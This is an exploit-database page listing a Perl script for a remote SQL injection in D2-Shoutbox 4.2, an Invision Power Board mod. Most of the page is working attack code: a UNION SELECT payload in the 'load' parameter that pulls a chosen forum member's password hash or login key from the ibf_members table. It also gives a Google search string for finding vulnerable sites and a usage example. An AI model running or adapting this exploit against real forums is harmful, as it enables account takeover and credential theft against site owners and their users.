[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

D2-Shoutbox 4.2 IPB Mod (load) Remote SQL Injection Exploit

Author
SkOd
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-294
Category
web applications
Date add
06-03-2006
Platform
unsorted
===========================================================
D2-Shoutbox 4.2 IPB Mod (load) Remote SQL Injection Exploit
===========================================================





#!/usr/bin/perl
#########################################################
#		 _______ _______ ______ 		#
#		 |______ |______ |     \		#
#		 ______| |______ |_____/		#
#		                        		#
#D2-Shoutbox 4.2(IPB Mod)<=SQL injection		#
#Created By SkOd                                        #
#SED security Team                                      #
#ISRAEL                                                 #
#########################################################
#google:
#"Powered By D2-Shoutbox 4.2"
#########################################################
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid  = $ARGV[3];
$pid  = $ARGV[4];
$type = $ARGV[5];

sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2\n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
$path = $ARGV[1].$sql;
}


sub header()
{
print q{
#######################################################################
###		 D2-Shoutbox 4.2 SQL injection Exploit 	    	    ### 
###		 Tested On D2-Shoutbox 4.2 And IPB 2.4 	    	    ###
###		  Created By SkOd, Sed Security Team 	    	    ###
#######################################################################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
#######################################################################
}
}

sub sedsock()
{
$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
print $sedsock "GET $path HTTP/1.1\n";
print $sedsock "Host: $host\n";
print $sedsock "Accept: */*\n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
print $sedsock "Connection: close\n\n";
while($res = <$sedsock>){
$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
}
}

if(@ARGV < 6){
header();
}else{
type();
sedsock();
}



#  0day.today [2024-11-15]  #